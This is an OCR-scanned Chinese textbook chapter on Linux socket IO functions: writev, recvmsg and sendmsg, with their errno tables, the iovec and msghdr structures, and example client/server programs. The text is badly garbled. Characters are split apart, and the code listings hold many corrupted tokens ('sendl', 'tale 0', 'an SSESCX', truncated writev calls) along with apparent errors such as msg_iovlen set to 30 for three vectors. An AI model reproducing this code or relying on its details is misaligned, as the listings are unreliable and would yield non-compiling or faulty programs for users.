的 成 员 变 量 iov_base 指向 内 存 空间 ，iov_len 表示 内 存 的 长 度 。 阴 影 部 分 表示 需要 设置 的 
vector 成 员 变 量 的 值 。 


9.1.4 使 用 writev() 函 数 发 送 数据 


writev() 函 数 可 向 多 个 缓冲 区 同时 写 入 数据 , 函数 原型 如 下 所 示 。writev(0) 函 数 向 套 接 字 
描述 符 s 中 写 入 在 向 量 vector 中 保存 的 count 块 数 据 。 
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长 度 


参数 vector 


中 内 存 空 间 


r 
AAA 
iov_len 4 iov_base 
pe 


长 度 


iov_len] iov_base 


内 存 空 间 


参数 count 


iov_len 1 iov_base 


内 存 空间 


图 9.1 函数 readv0 向 量 的 结构 


#include <sys/uio.h> 
ssize t writev(int fd, const struct iovec*vector, int count); 


writev() 函 数 的 返回 值 为 成 功 发 送 的 字 节 数 。 当 为 -1 时 错误 发 生 ， 可 以 查看 errno 获取 


错误 码 ， 参 见 表 9.5。 


表 9.5 ”writev() 函 数 errno 的 值 及 含义 


值 含义 
和 套 接 字 定义 为 非 阻塞 ， 而 操作 采用 了 阻塞 方式 ， 或 者 定义 的 超时 时 间 已 经 达到 却 
没有 接收 到 数据 
EBADF 参数 s 不 是 合法 描述 符 
ECONNREFUSED | 远程 主机 不 允许 此 操作 
EFAULT 接收 缓冲 区 指针 在 此 进程 之 外 
EINTR 接收 到 中 断 信 号 
A iov_len 超出 了 ssize t 类 型 的 范围 , 或 者 count 参数 小 于 0 或 者 大 于 可 允许 最 
ENOTCONN 套 接 字 s 表示 流 式 套 接 字 ， 此 套 接 字 没 有 连接 
ENOTSOCK 参数 不 是 套 接 字 描述 符 


参数 vector 为 一 个 指向 向 量 的 指针 ， 结 构 struct iovec 在 文件 <sys/uio.h> 中 定义 : 


struct iovec 


{ 


void*iov base; /* 向 量 的 缓冲 区 地 址 */ 
size t iov len; /* 向 量 缓冲 区 的 大 小 , 以 字 节 为 单位 */ 


}; 


在 调用 writev0 函 数 的 时 候 必须 指定 iovec 的 iov_base 的 长 度 ， 将 值 放 到 成 员 iov_len 
中 。 参数 vector 指向 一 块 结构 vector 的 内 存 , 大 小 由 count 指定 , 如 图 9.2 所 示 。 结构 vector 


.240 。 


第 9 章 数据 的 IO 和 复 用 


的 成 员 变量 iov_base 指向 内 存 空间 ，iov_len 表示 内 存 的 长 度 。 阴 影 部 分 表示 需要 设置 的 
vector 成 员 变 量 的 值 。 与 readv(0) 函 数 相 区 别 的 是 ，writev0) 函 数 的 vector 内 存 空间 的 值 都 已 
经 设 定好 了 。 


参数 vector 


长 度 


YY 


AAA 


参数 count 


pa| 


图 9.2 函数 writev0 向 量 的 结构 


9.1.5 使 用 recvmsg() 函 数 接收 数据 


recvmsg() 函 数 用 于 接收 数据 ， 与 recv() 函 数 、readv0 函 数 相 比较 ， 这 个 函数 的 使 用 要 
复杂 一 些 。 


1. 函数 recvmsg() 原 型 含义 
函数 原型 如 下 ,recvmsg(O 从 套 接 字 s 中 接收 数据 放 到 缓冲 区 msg 中 ,操作 的 方式 由 flags 


#include <sys/types.h> 

#include <sys/socket.h> 

ssize t recvmsg(int s, struct msghdr*msg, int flags); 

函数 的 返回 值 为 成 功 接收 到 的 字 节 数 ， 当 为 -1 时 错误 发 生 ， 可 以 查看 errno 获取 错误 
码 ， 参 见 表 9.6。 当 另 一 方 使 用 正常 方式 关闭 连接 的 时 候 返 回 值 为 0， 例如 调用 close() 函 数 
关闭 连接 。 

表 9.6 recvmsg() 函 数 errno 的 值 及 含义 

含义 

套 接 字 定 义 为 非 阻塞 ， 而 操作 采用 了 阻塞 方式 ， 或 者 定义 的 超时 时 间 已 经 达到 
却 没有 接收 到 数据 
参数 s 不 是 合法 描述 符 


EAGAIN 


EBADF 
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值 含义 
ECONNREFUSED 远程 主机 不 允许 此 操作 
EFAULT 接收 缓冲 区 指针 在 此 进程 之 外 
EINTR 接收 到 中 断 信号 
EINVAL 传递 了 不 合法 参数 
ENOTCONN 套 接 字 s 表示 流 式 套 接 字 ， 此 套 接 字 没有 连接 
ENOTSOCK 参数 不 是 套 接 字 描述 符 
ENOMEM 没有 足够 内 存 


recvmsg() 函 数 的 flags 参数 表示 数据 接收 的 方式 ， 可 以 为 表 9.7 中 的 值 〈 值 可 以 采用 按 


位 或 的 复合 值 ) 


值 
MSG DONTWAIT 
MSG ERRQUEUE 
MSG OOB 
MSG PEEK 
MSG TRUNC 


MSG_WAITALL 


表 9.7 recvmsg() 函 数 flags 的 值 及 含义 
含义 

非 阻塞 操作 ， 立 刻 返 回 ， 不 等 待 
音 误 消息 从 套 接 字 错误 队列 接收 
接收 外 数据 数据 
查看 数据 ， 不 进行 数据 缓冲 区 的 清 
返回 所 有 的 数据 ， 即 使 指定 的 缓冲 区 过 小 
MSG_WAITALL: 当 指 定 WAITALL 标志 时 ， 函 数 会 复制 与 用 户 指定 的 长 度 相等 
的 数据 。 如 果 内 核 中 的 当前 数据 不 能 满足 要 求 , 会 一 直 等 待 直到 数据 足够 的 时 候 
才 返 回 


2. 地 址 结构 msghdr 


函数 recevmsg() 中 用 到 结构 msghdr 的 原型 如 下 : 


struct msghdr { 


void *msg_name; /* 可 选 地 址 */ 
socklen t msg namelen; /* 地 址 长 度 */ 
struct iovec  *msg iov; /* 接 收 数据 的 数组 */ 
size t msg_iovlen; /*msg_iov 中 的 元 素数 量 */ 
void *msg_control; /*ancillary data, see below*/ 
socklen 七 msg_ controllen; /*ancillary data buffer len*/ 
int msg_flags; /* 接 收 消息 的 标志 */ 
}; 
口 成 员 msg_name 表示 源 地 址 ， 即 为 一 个 指向 struct sockaddr 的 指针 ， 当 套 接 字 还 没 
有 连接 的 时 候 有 效 。 
口 成 员 msg_namelen 表示 msg_name 指向 结构 的 长 度 。 
口 成 员 msg iov 与 函数 readv() 中 的 含义 一 致 。 
口 成 员 msg_iovlen 表示 msg_iov 缓冲 区 的 字 节 数 。 
口 成 员 msg_control 指向 缓冲 区 ， 根 据 msg_flags 的 值 ， 会 放 入 不 同 的 值 。 
口 成 员 msg_controllen 为 msg_control 指向 缓冲 区 的 大 小 。 
口 成 员 msg_flags 为 操作 的 方式 。 
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recv() 函 数 通 常用 于 TCP 类 型 的 套 接 字 ，UDP 使 用 recvfrom() 函 数 接收 数据 ， 当 然 在 
数据 报 套 接 字 绑 定 地 址 和 端口 后 ， 也 可 以 使 用 recv() 函 数 接收 数据 。 


3: 


函数 recvmsg() 从 内 核 的 接收 缓冲 
比 指定 上 


所 有 数 


函数 recvmsg() 用 户 空间 与 内 核 空间 的 交互 


据 到 用 户 缓冲 区 ， 并 返回 数据 的 长 度 。 当 内 核 接收 缓冲 


区 中 复制 数据 到 用 户 指定 的 缓冲 区 , 当 内 核 中 的 数据 
的 缓冲 区 小 时 ， 一 般 情 况 下 〈 没 有 采用 MSG_WAITALL 标志 ) 会 复制 缓冲 区 中 的 


区 中 的 数据 比 用 户 指定 的 多 


时 ， 会 将 用 户 指定 长 度 len 的 接收 缓冲 区 中 的 数据 复制 到 用 户 指定 地 址 ， 其 余 的 数据 需要 


下 次 调 


的 数据 ， 
用 一 个 msghdr 结构 的 头 部 数据 如 图 9.3 所 示 , msg_name 为 指向 一 个 20 个 字 节 缓冲 


使 


并 进行 调整 。 


接收 函数 的 时 候 再 复制 ， 内 核 在 复制 用 户 指定 的 数据 之 后 ， 会 销毁 已 经 复制 完毕 


区 的 指针 ，msg_iov 为 指向 4 个 向 量 的 指针 ， 每 个 向 量 的 缓冲 区 大 小 为 60 个 字 节 。 本 机 的 


IP 地 址 


沪 


为 192.168.1.151。 


图 9.3 结构 msghdr 头 部 的 结构 


则 接收 数据 后 msghdr 结构 的 情况 如 图 9.4 所 示 。 


9.1.6 


使 用 sendmsg() 函 数 发 送 数据 


msg_name “六 
msg namelen |16 
msg_iov | | iov_base Co iov_base 
msg_iovlen 4 iov_len 60 
msg_control iov_base | iov_base 
msg_controllen |0 iov_len 60 
msg_flags 0 iov_base 一 一 一 一 一 iov_base 
iov_len 60 
iov_base 上 -一 iov_base 
iov_len 60 


用 recvmsg(O) 函 数 接受 来 自 192.168.1.150 的 发 送 到 192.168.1.151 的 200 个 UDP 数据 ， 


函数 sendmsgO 可 用 于 向 多 个 缓冲 区 发 送 数据 ， 函 数 原 型 如 下 所 示 。 函 数 sendmsg(O) 疝 


套 接 字 描 述 符 s 中 按照 结构 msg 的 设 定 写 入 数据 ， 其 中 


#include <sys/uio.h> 
ssize t sendmsg(int s, const struct msghdr*msg, int flags); 


Pp 操作 方式 由 flags 指定 。 
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四. AF JINET.8888 


192.168.1.150 


msg_name 


re 久 16 
msg_iov ER | iov_base 一 一 - 委 iov_base 7 


msg _iovlen 4 iov_len 60 


msg_control Eq 如 3 玉 2 


上 g_controllen/A 0 iov_len 60 


mas 
HG iov_base pH 
msg_flags 0 ov iov ms 0 
2 F A 


iov_len 60 
| A 
iov_len 60 


图 9.4 接收 数据 消息 结构 的 传 出 状态 
函数 sendmsg() 与 recevmsg() 相 区 别 的 地 方 在 于 sendmsg 的 操作 方式 由 flags 参数 设 定 ， 
而 recvmsg 的 操作 方式 由 参数 msg 结构 里 的 成 员 变 量 msg_flags 指定 。 
例如 ,向 IP 地 址 为 192.168.1.200 主机 的 9999 端口 发 送 300 个 数据 , 协议 为 UDP 协议 ， 
将 msg 参数 中 的 向 量 缓冲 区 大 小 设 为 100 个 ， 使 用 3 个 向 量 ，msg 的 状态 如 图 9.5 所 示 。 


2 INET.9999 
2 192.168.1.200 


msg_name 


iov_base 


iov_len 


iov_base 


iov_len 


iov_base 


图 9.5 向 人 P 地 址 192.168.1.200 端口 9999 发 送 3000 个 数据 的 msg 结构 示意 图 
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9.1.7 IO 函数 的 比较 


表 9.8 为 上 述 函数 使 用 时 的 特点 ，O 〇 标记 的 为 具有 此 种 属性 。 有 如 下 规律 

口 函数 read0/write0 和 readv()/writev0 可 以 对 所 有 的 文件 描述 符 使 用 ;，recv()/send()、 
recvfrom()/writeto() 和 recvmsg/sendmsg 只 能 操作 套 接 字 描 述 符 。 

口 函数 readv()/writev() 和 recvmsg()/sendmsg() 可 以 操作 多 个 缓冲 区 ，read()/write()、 
recv()/send() 和 recvfrom()/sendto() 只 能 操作 单个 缓冲 区 。 

口 函数 recv(/send()、recvfrom()/sendto() 和 recvmsg()/sendmsg() 具 有 可 选 标志 。 

口 函数 recvfrom0O/sendto() 和 recvmsg()/sendmsg() 可 以 选择 对 方 的 IP 地 址 。 

口 函数 recevmsg()/sendmsg() 有 可 选择 的 控制 信息 ， 能 进行 高 级 操作 。 


表 9.8 1O 函数 的 比较 


任何 描 | 只 对 套 接 g 多 个 缓 二 可 选 对 | 可 选 控 


rmssenimsed)| | O | |olo lo 
9.2 使 用 IO 函数 的 例子 


9.1 节 中 对 典型 的 IO 函数 进行 了 介绍 ， 本 节 将 针对 上 述 的 函数 给 出 程序 设计 的 例子 。 
包括 典型 的 send()/recv()、writev()/readv()、sendmsg()/recvmsg() 这 3 种 类 型 。 


9.2.1 客户 端 处 理 框架 的 例子 
客户 端 处 理 程序 是 一 个 程序 框架 ， 为 后 面 使 用 3 种 类 型 的 收发 函数 建立 基本 的 架构 。 
1. 客户 端 程序 框架 


客户 端的 流程 如 图 9.6 所 示 ， 步 骤 如 下 : 

(1) 对 程序 的 输入 参数 进行 判断 ， 查 看 是 否 输入 了 要 连接 的 服务 器 卫 地 址 。 

(2) 挂 接 信号 SIGINT 的 处 理 函数 和 sig_proccess() 和 SIGPIPE 的 处 理 函 数 sig_pipe()， 
用 于 处 理子 进程 退出 信号 和 套 接 字 连 接 断 开 的 情况 。 

(3) 建立 一 个 流 式 套 接 字 ， 结 果 放 置 在 s 中 。 

(4) 对 要 绑 定 的 地 址 结构 进行 赋值 ，IP 地 址 为 用 户 输入 的 值 ， 端 口 为 8888。 

(5) 连接 服务 器 。 

(6) 调用 函数 process_conn_client0 进 行 客户 端 数据 的 处 理 , 这 个 函数 在 不 同 的 模式 下 ， 
收发 函数 的 实现 方式 不 同 。 

(7) 处 理 完毕 后 关闭 套 接 字 。 
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输入 参数 合法 性 
判断 


了 
挂 接 SIGINT 和 
SIGPIPE 信 和 号 


建立 流 式 套 接 字 


了 
设置 服务 器 地 址 


连接 服务 器 


时 
客户 端 处 理 过 程 


1 
关闭 连接 


图 9.6 客户 端 处 理 流程 


2. 客户 端 程序 框架 代码 


客户 端 框架 的 实现 代码 如 下 ， 在 程序 的 开始 调用 函数 signal() 注 册 SIGINT 和 SIGPIPE 
售 号 的 处 理 函 数 ， 然 后 连接 服务 器 并 进行 数据 处 理 。 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <strings.h> 

04 #include <sys/types.h> 

05 #include <sys/socket.h> 

06 #include <unistd.h> 

07 #include <netinet/in.h> 

08 #include <signal.h> 

09 extern void sig Proccess (int signo); 
10 extern void sig_pipe(int signo); 
i1 static int ss 


12 void sig proccess client (int signo) /* 客 户 端 信号 处 理 回调 函数 
L390 

1 

15 printf("Catch a exit signal\n"); /* 打 印信 息 */ 

16 close(s); /* 关 闭 套 接 字 */ 

17 exit (0); /* 退 出 程序 */ 

18 1} 

19 #define PORT 8888 /* 侦 昕 端口 地 址 */ 


20 int main(int argc, char*argv[]) 
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struct sockaddr in server addr; /* 服 务 器 地 址 结构 */ 
int err; /* 返 回 值 */ 


if(argc == 1){ 
printf ("PLS input server addr\n"); 
return 0; 
‘| 
signal (SIGINT, sig proccess); 
/* 挂 接 SIGINT 信号 , 处理 函 数 为 sig_process ()*/ 
signal (SIGPIPE, sig pipe); 
/* 挂 接 SIGPIPE 信号 ,处理 函数 为 sig_pipe () x/ 


s = socket (AF INET, SOCK STREAM, 0); /* 建 立 一 个 流 式 套 接 字 */ 
(< 0 /* 建 立 套 接 字 出 错 */ 


printf ("socket error\n"); 
return -1; 


} 


/* 设 置 服务 器 地 址 */ 
bzero(&server addr, sizeof (server addr)); /* 将 地 址 结构 清 零 */ 
server addr.sin family = AF INET; /* 将 协议 族 设置 为 AF_INET*/ 
server addr.sin addr.s addr = htonl (INADDR ANY); 

/*IP 地 址 为 本 地 任意 IP 地 址 */ 
server addr.sin port = htons (PORT); /* 设 置 服务 器 端口 为 8888*/ 


inet Pton (REF INET, argv[1], &server addr.sin addr); 
/* 将 用 户 输入 的 字符 串 类 型 的 IP 地 址 转 为 整 型 */ 


connect(s, (struct sockaddr*) &server addr, sizeof(struct sockaddr)); 


/* 连 接 服务 器 */ 
process conn client(s); /* 客 户 端 处 理 过 程 */ 
close(s); /* 关 闭 连 接 */ 


9.2.2 ”服务 器 端 程序 框架 


服务 器 让 


省 处 理 程序 是 一 个 程序 框架 ,为 后 面 使 用 3 种 类 型 的 收发 函数 建立 基本 的 架构 。 


函数 process_conn_server() 是 进行 服务 器 端 处 理 的 函数 ， 不 同 收发 函数 的 实现 方式 。 


01 
02 
03 
04 
05 
06 
07 
08 
09 
10 
生 开 
之 
13 
14 
hs 
16 
| 


#include <stdio.h> 

#include <stdlib.h> 

#include <strings.h> 

#include <sys/types.h> 

#include <sys/socket.h> 

#include <unistd.h> 

#include <netinet/in.h> 

#include <signal.h> 

extern void sig_Proccess (int signo); 


#define PORT 8888 /* 侦 听 端 口 地 址 */ 
#define BACKLOG 2 /* 侦 听 队 列 长 度 */ 
int main(int argc, char*argv[]) 


{ 


an SSESCX /*ss 为 服务 器 的 socket 描述 符 , sc 为 客户 端的 socket 描述 符 */ 


struct sockaddr in server addr; /* 服 务 器 地 址 结构 */ 
struct sockaddr in client addr; /* 客 户 端 地 址 结构 */ 
int err; /* 错 误 值 */ 
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pid t pid; /* 分 叉 的 进行 id*/ 


signal (SIGINT, sig proccess); 

/* 挂 接 SIGINT 信号 ,处理 函数 为 sig_process ()*/ 
signal (SIGPIPE, sig proccess); 

/* 挂 接 SIGPIPE 信号 ,处理 函数 为 sig_pipe () */ 


ss = socket (AF INET, SOCK STREAM, 0); /* 建 立 一 个 流 式 套 接 字 */ 
a 0 7* 出 错 */ 


printf ("socket error\n"); 
return -1; 


} 


/* 设 置 服务 器 地 址 */ 

bzero(&server addr, sizeof(server addr)); /* 清 零 */ 

server addr.sin family = AF INET; /* 协 议 族 */ 

server addr.sin addr.s_addr = htonl (INADDR_ANY) ;/* 本 地 地 址 */ 
server addr.sin port = htons (PORT); /* 服 务 器 端口 */ 


/* 绑 定 地 址 结构 到 套 接 字 描述 符 */ 
err=bind(ss, (struct sockaddr*) &server addr, sizeof (server addr)); 
if(err < 0){ /* 绑 定 出 错 */ 

printf ("bind error\n"); 

return 二 


err = listen(ss, BACKLOG); /* 设 置 侦 听 队列 长 度 */ 
if(err < 0){ /* 出 错 */ 


printf ("listen error\n"); 
return -1; 


} 


/* 主 循环 过 程 */ 
for(;;) { 
int addrlen = sizeof(struct sockaddr); 

/* 接 收 客户 端 连接 */ 
sc = accept(ss, (struct sockaddr*)&client addr, &addrlen); 
tale 0 /* 客 户 端 连接 出 错 */ 

continue; /* 结 束 本 次 循环 */ 
} 
/* 建 立 一 个 新 的 进程 处 理 到 来 的 连接 */ 
pid = fork(); /* 分 叉 进程 */ 
if( pid == 0 ){ /* 子 进程 中 */ 
close(ss) /* 在 子 进程 中 关闭 服务 器 的 侦 听 */ 
process_conn server (sc); ”/* 处 理 连接 */ 
}else{ 
close (sc); /* 在 父 进程 中 关闭 客户 端的 连接 */ 


} 


9.2.3 使 用 recv() 和 send() 函 数 


下 面 的 代码 是 使 


代码 。 


.248 。 


j recv() 和 send() 函 数 进行 网 络 数 据 收发 时 服务 器 和 客户 端的 实现 


第 9 章 数据 的 IO 和 复 用 


1. 服务 器 端的 实现 代码 


服务 器 端的 处 理 过 程 先 使 用 recv0) 函 数 从 套 接 字 文 件 描述 符 s 中 读 取 数据 到 缓冲 
buffer 中 ， 如 果 不 能 接收 到 数据 ， 则 退出 操作 。 服 务 器 成 功 接收 数据 后 ， 利 用 接收 到 的 数 
据 构 建 发 送 给 客户 端的 响应 字符 串 ， 调 用 send() 函 数 将 响应 字符 串 发 送 给 客户 端 。 

01 “/# 服 务 器 对 客户 端的 处 理 */ 

02 void process conn serverl(int s) 

03 { 

04 ssize t size = 0; 


05 char buffer[1024] /* 数 据 的 缓冲 区 */ 


区 


07 for(;;){ /* 循 环 处 理 过 程 */ 

08 size = recv(s, buffer, 1024,0); 

09 /* 从 套 接 字 中 读 取 数 据 放 到 缓冲 区 buffer 中 */ 
10 if(size == 0){ /* 没 有 数据 */ 

11 return; 

12 } 


14 sprintf (buffer, "%d bytes altogether\n", size); 
5 /* 构 建 响应 字符 ,为 接收 到 客户 端 字 节 的 数量 */ 
16 sendl(s, buffer, strlen (buffer)+1,0); /# 发 给 客户 端 */ 


2. 客户 端的 处 理 代码 
客户 端的 处 理 代码 是 一 个 循环 过 程 。 在 循环 中 ， 客 户 端 调用 read0 函 数 从 标准 输入 读 
取 输 入 信息 ; 调用 send0) 函 数 将 信息 发 送 给 服务 器 后 , 调用 recv() 函 数 接收 服务 器 端的 响应 ， 
将 服务 器 端的 响应 结果 写 到 标准 输出 端 。 
01 “/* 客 户 端的 处 理 过 程 */ 


02 void Process_conn_client(int s) 


03 { 

04 ssize t size = 0; 

05 char buffer[1024]; /* 数 据 的 缓冲 区 */ 

06 

07 for(;;){ /* 循 环 处 理 过 程 */ 

08 size = read(0, buffer, 1024); 

09 /* 从 标准 输入 中 读 取 数据 放 到 缓冲 区 buffer 中 */ 
10 if(size > 0){ /* 读 到 数据 */ 

El sendl(s, buffer, size,0); /* 发 送 给 服务 器 */ 

12 size = recv(s, buffer, 1024,0); /* 从 服务 器 读 取 数 据 */ 
3 write(1l, buffer, size); /* 写 到 标准 输出 */ 

14 上 

ES } 

oh 


3. 信号 SIGINT 的 处 理 函 数 
在 本 例 中 ，SIGINT 的 处 理 函 数 不 进行 其 他 操作 ， 直 接 退 出 应 用 程序 。 
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01 /* 信 号 SIGINT 的 处 理 函 数 */ 


02 void sig proccess(int signo) 


03 { 

04 Printf("Catch a exit signal\n"); 
05 _exit (0); 

(0 


4. 信号 SIGPIPE 的 处 理 函 数 
与 SIGINT 的 处 理 函 数 一 样 ，SIGPIPE 的 信号 处 理 函 数 也 不 进行 其 他 操作 ， 接 收 到 套 
接 字 断 开 的 信号 后 程序 直接 退出 。 


01 /* 信 号 SIGPIPE 的 处 理 函 数 */ 
02 void sig pipe(int sign) 


03 

04 printf ("Catch a SIGPIPE signal\n"); 
05 

06 /* 释 放 资 源 */ 

07 下 


9.2.4 使 用 readv() 和 write() 函 数 


使 用 如 下 的 代码 代替 9.2.1 节 中 的 函数 process_conn_client() 和 9.2.2 节 中 的 函数 
process_conn_server()， 使 用 readv() 和 writev0) 函 数 进行 读 写 。 


1. 服务 器 端的 实现 代码 


下 面 是 使 用 readv() 和 writevO 进 行 数据 IO 的 服务 器 处 理 的 代码 , 利用 向 量 来 接收 和 发 
送 网 络 数据 。 处 理 过 程 利 用 3 个 向 量 来 完成 数据 的 接收 和 响应 工作 。 先 申请 3 个 向 量 ， 每 
个 向 量 的 大 小 是 10 个 字符 。 利 用 一 个 公共 的 30 个 字 节 大 小 的 缓冲 区 buffer 来 初始 化 3 个 
向 量 的 地 址 缓冲 区 , 将 每 个 向 量 的 向 量 长 度 设置 为 10。 调 用 readv() 来 读 取 客 户 端的 数据 后 ， 
利用 3 个 缓冲 区 构建 响应 信息 ， 最 后 将 响应 信息 发 送 给 服务 器 端 。 

01 #include <sys/uio.h> 
02 #include <string.h> 
03 #include <stdlib.h> 
04 #include <stdio.h> 


05 #include <unistd.h> 
06 static struct iovec*vs=NULL,*vc=NULL; 


07 void process conn server(int s) /* 服 务 器 对 客户 端的 处 理 */ 
08 { 

09 char buffer[30]; /* 向 量 的 缓冲 区 */ 

10 ssize t size = 0; 

11 

12 struct iovec*v = (struct iovec*)malloc(3*sizeof(struct iovec)); 
13 /* 申 请 3 个 向 量 */ 

14 二 

ES printf ("Not enough memory\n"); 

16 return; 

Ey 

18 

19 vs = vi /* 挂 接 全 局 变量 , 便于 释放 管理 */ 
20 /* 每 个 向 量 10 个 字 节 的 空间 * / 
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Vv[0] .iov base = buffer; /*0~9*/ 
Vv[1] .iov base = buffer + 10; /*10~19*/ 
Vv[2] .iov base = buffer + 20; /*20~29*/ 
v[0] .iov len = v[1] .iov len = v[2] .iov len = 10; 
/* 初 始 化 长 度 为 10*/ 

Eee /* 循 环 处 理 过 程 */ 

size = readv(s, v, 3); /* 从 套 接 字 中 读 取 数据 放 到 向 量 缓冲 区 中 */ 

if(size == 0){ /* 没 有 数据 */ 

return; 
| 


/* 构 建 响应 字符 ,为 接收 到 客户 端 字 节 的 数量 , 分 别 放 到 3 个 缓冲 区 中 
kd 
sprintf (v[0] .iov base, "%d ", size); /* 长 度 */ 
sprintf (v[1] .iov base, "bytes alt"); /*"bytes alt" 字 符 串 */ 
sprintf (v[2] .iov base, "ogether\n"); /*"ogether\n" 字 符 串 */ 
/* 写 入 字符 串 长 度 */ 
Vv[0] .iov len = strlen(v[0] .iov base); 
Vv[1] .iov len = strlen(v[1].iov base); 
V[2] .iov len = strlen(v[2] .iov base); 


writev(s, v, . /* 发 给 客户 端 */ 


之 


2. 客户 端的 处 理 代码 
与 服务 器 端的 代码 类 似 ， 客 户 端 也 使 用 3 个 10 字 节 大 小 的 向 量 来 完成 数据 的 发 送 和 


接收 操作 。 
01 /* 客 户 端的 处 理 过 程 #/ 
02 void process conn client(int s) 
03 1 
04 char buffer[30]; /* 向 量 的 缓冲 区 */ 
05 ssize t size = 0; 
06 /* 申 请 3 个 向 量 */ 
07 struct iovec*v = (struct iovec*)malloc(3*sizeof (struct iovec)); 
08 Ed 
09 printf ("Not enough memory\n"); 
10 return; 
hl } 
12 /* 挂 接 全 局 变量 ,便于 释放 管理 */ 
3 VC = V7 
14 /* 每 个 向 量 10 个 字 节 的 空间 */ 
5 v[0] .iov base = buffer; /*0~9*/ 
16 v[1] .iov base = buffer + 10; /*10~19*/ 
和 7 T[2] .iov base = buffer + 20; /*20~29*/ 
18 /* 初 始 化 长 度 为 10*/ 
19 v[0] .iov len = v[1] .iov len = v[2].iov_ len = 10; 
20 
2 int i = 0; 
2 Eon /* 循 环 处 理 过 程 */ 
23 /* 从 标准 输入 中 读 取 数 据 放 到 缓冲 区 buffer 中 */ 
24 size = read(0, v[0] .iov_ base，10) 
2 if(size > 0){ /* 读 到 数据 */ 
26 v[0] .iov len= size; 
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2 writev(s, v1); /* 发 送 给 服务 器 */ 

28 Vv[0] .iov len = v[1].iov_ len = v[2] .iov len = 10; 

29 size = readv(s, v, 3); /* 从 服务 器 读 取 数 据 */ 

30 for(i = 0;i<37it++) 1 

31 if(v[il].iov len > 0){ 

32 write(l1l, v[i].iov base, v[i].iov len); 
/* 写 到 标准 输出 */ 

33 } 

34 } 

35 } 

36 } 

SR 


3. 信号 SIGINT 的 处 理 函 数 

由 于 本 例 中 向 量 的 内 存 空间 是 动态 申请 的 ， 程 序 退 出 的 时 候 不 能 自动 释放 。 所 以 在 信 
号 SIGINT 到 来 的 时 候 ， 先 释放 申请 的 内 存 空间 ， 再 退出 应 用 程序 。 

01 /* 信 号 SIGINT 的 处 理 函 数 */ 


02 void sig proccess(int signo) 


03- 

04 printf ("Catch a exit signal\n"); 

05 /* 释 放 资 源 */ 
06 free (ve); 

07 free(vs); 

08 exit (0); 

09 } 


4. 信号 SIGPIPE 的 处 理 函 数 
与 SIGINT 的 处 理 过 程 类 似 ， 在 信号 SIGPIPE 到 来 的 时 候 ， 其 处 理 函 数 也 是 先 释放 申 
请 的 内 存 空间 再 退出 应 用 程序 。 


01 /* 信 号 SIGPIPE 的 处 理 函 数 */ 
02 void sig pipel(int sign) 


03. 1 

04 printf ("Catch a SIGPIPE signal\n"); 

05 

06 /+* 释 放 资源 */ 
07 free(vc); 

08 free (vs) 

09 _exit(0) 

10 } 


9.2.5 使 用 recvmsg() 和 sendmsg() 函 数 
使 用 如 下 的 代码 代替 9.2.1 节 中 的 函数 process_conn_client() 和 9.2.2 节 中 的 process_ 


、 


conn_server() 函 数 ， 使 用 recvmsg0 和 sendmsg() 函 数 进行 读 写 。 
1. 服务 器 端的 实现 代码 


与 readv() 和 writev() 的 服务 器 处 理 过 程 相似 , 使 用 消息 函数 进行 IO 的 服务 器 处 理 过 程 
同样 适用 3 个 10 字 节 大 小 的 向 量 缓冲 区 来 保存 数据 .但 是 并 不 是 直接 对 这 些 向 量 进行 操作 ， 
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而 是 将 向 量 挂 载 消息 结构 msghdr 的 msg iov 成 员 变 量 上 进行 操作 , 并 将 向 量 的 存储 空间 长 
度 设置 为 30。 在 服务 器 端 调用 函数 recvmsg() 从 套 接 字 s 中 接收 数据 到 消息 msg 中 ， 将 接 
收 到 的 消息 进行 处 理 后 ， 调 用 sendmsg() 函 数 将 响应 数据 通过 套 接 字 s 发 出 。 


01 #include <sys/uio.h> 

02 #include <string.h> 

03 #include <stdio.h> 

04 #include <unistd.h> 

05 #include <stdlib.h> 

06 #include <sys/types.h> 

07 #include <sys/socket.h> 

08 static struct iovec*vs=NULL,*vc=NULL; 
09 /* 服 务 器 对 客户 端的 处 理 */ 


10 void process conn serverl(int s) 


1 Dt 

T2 char buffer[30]; /* 向 量 的 缓冲 区 */ 

13 ssize t size = 0; 

14 struct msghdr msg; /* 消 息 结构 */ 

15 

16 /* 申 请 3 个 向 量 */ 

17 struct iovec*v = (struct iovec*)malloc(3*sizeof (struct iovec)); 
18 if(1v){ 

19 printf ("Not enough memory\n"); 

20 return; 

电 于 } 

22 /* 挂 接 全 局 变量 , 便于 释放 管理 */ 

2 号 VS = TV; 

24 /* 初 始 化 消息 */ 

2 msg.msg_name = NULL; /* 没 有 名 字 域 */ 

26 msg.msg namelen = 0; /* 名 字 域 长 度 为 0*/ 

人 msg.msg_control = NULL; /* 没 有 控制 域 */ 

28 msg.msg_controllen = 0; /* 控 制 域 长 度 为 0*/ 

29 msg.msg iov = Vv; /* 挂 接 向 量 指针 */ 

30 msg.msg_iovlen = 30; /* 接 收 缓冲 区 长 度 为 30*/ 

Ef msg.msg flags = 0; /* 无 特殊 操作 */ 

32 /* 每 个 向 量 10 个 字 节 的 空间 */ 
33 v[0] .iov base = buffer; /*0~9*/ 

34 Vv[1] .iov base = buffer + 10; /*10~19*/ 

35 VvV[2] .iov base = buffer + 20; /*20~29*/ 

36 /* 初 始 化 长 度 为 10*/ 

37 Vv[0] .iov len = v[1].iov len = v[2] .iov len = 10; 

38 

39 for(2;)t /* 循 环 处 理 过 程 */ 

40 /* 从 套 接 字 中 读 取 数据 放 到 向 量 缓冲 区 中 */ 
41 size = recvmsg(s, &msg, 0); 

42 if (size == 0){ /* 没 有 数据 */ 

43 return; 

44 } 

45 

46 /* 构 建 响应 字符 ,为 接收 到 客户 端 字 节 的 数量 ,分 别 放 到 3 个 缓冲 区 中 */ 

a sprintf (v[0] .iov base, "%d ", size); /* 长 度 */ 

48 sprintf(v[1] .iov base, "bytes alt"); /*"bytes alt" 字 符 串 */ 
49 sprintf (v[2] .iov base, "ogether\n"); /xnogetherN\n" 字 符 串 */ 
50 /* 写 入 字符 串 长 度 */ 

ol v[0] .iov len = strlen(v[0] .iov base); 

这 v[1].iov_ len = strlen(v[1].iov base); 


me 
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55 } 
56 


2. 客户 端的 处 理 代 码 
与 服务 器 端 对 应 , 客户 端的 实现 也 将 3 个 向 量 提 
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2] .iov base) 


/* 发 给 客户 端 */ 


E 接 在 一 个 消息 上 进行 数据 的 收发 操作 。 


01 “/#* 客 户 端的 处 理 过 程 */ 

02 void process conn client (int s) 

(Ei 

04 char buffer[30]; /* 向 量 的 缓冲 区 */ 

05 ssize t size = 0; 

06 struct msghdr msg; /* 消 息 结构 */ 

07 

